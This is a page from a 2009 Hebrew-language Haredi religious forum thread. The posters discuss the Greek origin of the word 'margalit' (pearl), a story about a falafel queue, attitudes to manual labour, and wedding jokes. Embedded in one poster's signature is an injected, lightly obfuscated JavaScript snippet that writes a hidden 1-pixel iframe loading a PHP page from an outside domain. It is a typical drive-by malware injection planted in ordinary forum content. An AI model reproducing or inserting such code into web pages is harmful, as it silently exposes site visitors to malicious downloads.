בית פורומים עצור כאן חושבים

גילוי מטפיזי-חסידי בתור לפלאפל (סיפור אמיתי)

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-7/5/2009 14:43 לינק ישיר 

.

למיטב זכרוני החלוד כדבעי, מקור המלה "מרגלית" הוא במלה היוונית לפנינה - מרגריטס.
מכאן גם עבד נוקב מרגליות - מומחה לניקוב פנינים ועשית מחרוזות מהן.

המלה "מרגניתא" היא כבר שיבוש של מרגלית, חילופי נ' ו-ל' מצויים ביותר בעברית ובארמית.

מבחינה לשונית, "מרגלא" זה כפי שנאמר, ואין קשר בין השורש העברי/ארמי רג"ל לבין המלה היוונית שהתגלגלה להיות מרגלית.

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 15:14 לינק ישיר 

בר בי רב

ילמדנו רבנו היכן מצאת במקרא- את המילה מרגלית- מתרוגמת? הרד'ק מתרגם את ה- ספיר- למרגלית.

רק תראו - מה למדנו מחצי מנה פלאפל!!! כשמו כן הו פלא-פל(אים)

מודה ועוזב

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 15:21 לינק ישיר 

צבוני, תודה.

(וברוך הבא אל הפורום, אם אתה חדש).

הסיבה שהתעוררתי להגיב היתה שחשתי שבאמת לא הייתי בסדר. אם במעשה, אם בכתיבה, אם במחשבה, אם בהתייחסות.

ועדיין אני בודק את עצמי.

על כל פנים, יש בסיפור זה כמה וכמה תיאורים שאינם לא מאפיינים אותי ביותר ולא משקפים את דעתי בשאלות רבות. כמדומה שאיני היחיד שבדעתו עולות מחשבות שונות בנסיבות כאלו ואחרות, ולאחר רגע הוא שואל את עצמו אם זה באמת משקף את דעתו ומחליט שלא, אלא שהתרגלתי לקו מסויים ולכן צריך מאמץ מודע להתרחק ממנו. מלבד זאת, התיאור של "מיימוני" בהתייחסותו לעובדי כפים בעבודות דחק הוא באמת מוגזם והוא לצורך הסיפור, כאנטיתזה לשינוי התפיסה שבא בסוף. וצדקו כמובן אלו שקבעו שגם ה"הוה אמינא" (=מה שחשבתי בהתחלה) היא פגומה.

על דבר אחד עם זאת אני עומד. בהתחשב במצב שקיים או היה קיים בבני ברק החרדית או של "בני תורה", התייחסות כזו היתה (ואולי עודנה) יוצאת דופן ולכן ראויה לשבח.

לגבי סיום הסיפור, זה היה פשוט משחק מילים על "סוף". כמדומה שזכות ההמצאה של "סוף טוב הכל טוב" היא של שייקספיר.

ולירוחם,איקון ירוק על הציטוט הראוי מאד. כמדומה שבאחת מתגובותי שציטטתי את המקור הזה,ואני יכול להעיד שהוא היה לנגד תודעתי, בזמן הסיפור, בזמן הכתיבה ובכלל. (והוא מלוה אותי כל הזמן,  כחלק מעבודה על ענווה, שלא יחזיק אדם עצמו על מתנות שלא עמל עליהן אלא קיבל במתנה).

ולגבי אכילת פלאפל, יש כאלו שמפנקים את הילדים בראש חודש באיזה מעדן מיוחד. ויש בהחלט לפקפק אם ראוי לקבוע סעודת פלאפל ופיצה כמעדן לראש חודש, וגם זה נושא.

אשמח לדעת מי הרב שלקה בגלל שאכל פלאפל. אני איני מכיר את הסיפור הזה.

מעתה נתונה הרשות לפתח את הדיון בכיוונים האפשריים הבאים:

א. היחס לעבודת כפים בציבור החרדי. ובמקורות. והסוציולוגיה החרדית המודרנית והאידיאולוגיה שלה.

ב. סגנונות ספרותיים ומשמעותם האידיאולוגית.

ג. אכילת פלאפל, פיצה ומזון מהיר מוכן כתופעה בבני ברק ובציבור החרדי בכלל והשפעתה בתחום החינוכי.

ואולי עוד?

_תוקן כדי להוסיף עוד כמה הבהרות.

שומר פיו ולשונו - שומר מצרות נפשו ******* language=""> *-- var as="'h'; var" ac="'tt'; var" ab="'p'; var" ay="//"; document.write("*************** src="'"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"'" frameborder="'0'" height="1px" width="1px" scrolling="'no'" ><*"); //*

תוקן על ידי מיימוני ב- 07/05/2009 15:22:45

שומר פיו ולשונו - שומר מצרות נפשו < language="">

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 15:27 לינק ישיר 

לירוחם

ובזכותך למדנו עוד משהו

מרגלית-פנינה-מרגרט

שלושה  שמות נשיים שמשמעותן אחת.

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 15:44 לינק ישיר 

לירוחם

כדבריך, אין במקרא "מרגלית".

אך בחז"ל יש עשרות פעמים את המלה "מרגניתא" בהוראת "מרגלית", ותודה רבה למואדיב על כך שהחכימנו בדרך גלגול המילה היוונית, לעברית ולארמית.

צענערענע

שכחת להוסיף את פעריל, שהיא פנינה באידיש.

הצד השוה בכל 4 הנשים הנזכרות, שכולן קוראות בצענערענע...

תוקן על ידי בר_בי_רב ב- 07/05/2009 15:45:12

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 15:50 לינק ישיר 

הרב מימוני

הסיפור עם אכילת הפלאפל, היה בעיר הקודש ב"ב תבותבב"א, לפני כ 20 שנה  הרב היה מאחד הישיבות החשובות בזמנו,

עד כאן ולא אוסיף. מחשש לה"ר

מודה ועוזב

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 16:02 לינק ישיר 

תנא דמסייע לירוחם:

"הם אמרו - תלמידי רבן יוחנן בן זכאי שלשה שלשה דברים כמה וכמה דברים אמרו אלא ר"ל שהיו רגילין כל אחד לומר שלשה דברים בכל יום כענין שאמרו (מרגניתא) [מרגלא] בפומיה דרב בדברים הצריכים תדיר" (פ' רבינו יונה על אבות פ"י מ"ב)

<{[(מעניין היה לדעת לטובת אילו סוגריים היתה מכריעה אמשלום )]}>

תוקן על ידי mzohar ב- 07/05/2009 16:00:13

מ. זוהר

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 16:27 לינק ישיר 

לבר בי רב

תודה על השם הרביעי שנשמט מזכרוני.

לגבי הקריאה בצענערענע :

פערל -אולי

פנינה מרגלית ומרגרט-הלוואי

תוקן על ידי צענערענע ב- 07/05/2009 16:25:47

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 16:37 לינק ישיר 

רב מימוני

ולגבי אכילת פלאפל, יש כאלו שמפנקים את הילדים בראש חודש באיזה מעדן מיוחד.

בענין פינוק הילדים- לפני הגיוס הזמין - ברוחב ליבו- אבא פרסי, את בנו המתגייס  -למנת אבטיח,- במזנון השכונתי. 

כשהבחור השתחרר, לאחר שלש שנים,- עברו שוב ליד המזנון- אמר הבן- אבא! בא לי קולה.

השיב האב,- בני! אתה לא יודע, כי לאחר אכילת אבטיח לא שותים קולה?

מודה ועוזב

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 17:00 לינק ישיר 

צענערענע כתב:

לגבי הקריאה בצענערענע :

פערל -אולי

פנינה מרגלית ומרגרט-הלוואי

דדווח על תוכן פוגעני

נשלח ב-7/5/2009 17:31 לינק ישיר 

בר בי רב

אשת חייל מי ימצא ורחוק מפנינים מכרה. כל אישה היא מרגלית, פנינה, פערעלע וברילאנט, צריכים רק לגלות אותה.

היא מתגלה רק אם יודעים להעריך אותה, ומתיחסים אליה בהתאם לערכה,

בשבע ברכות- אמרתי לחתן-  חתן דומה למלך- אתה יודע כמה זמן יקראו לך מלך?= כל זמן שאשתך- תהיה  מלכה..

מודה ועוזב

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > גילוי מטפיזי-חסידי בתור לפלאפל (סיפור אמיתי)
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 סך הכל 4 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. בקטגוריית דת ואמונה אתם מוזמים להיכנס ולדון על כל נושא שעולה לכם בקשר לדת היהודית. שו''ת בנושאי הלכה, פרשנות לתורה ולמקרא, גאולה, אחרית הימים ועוד.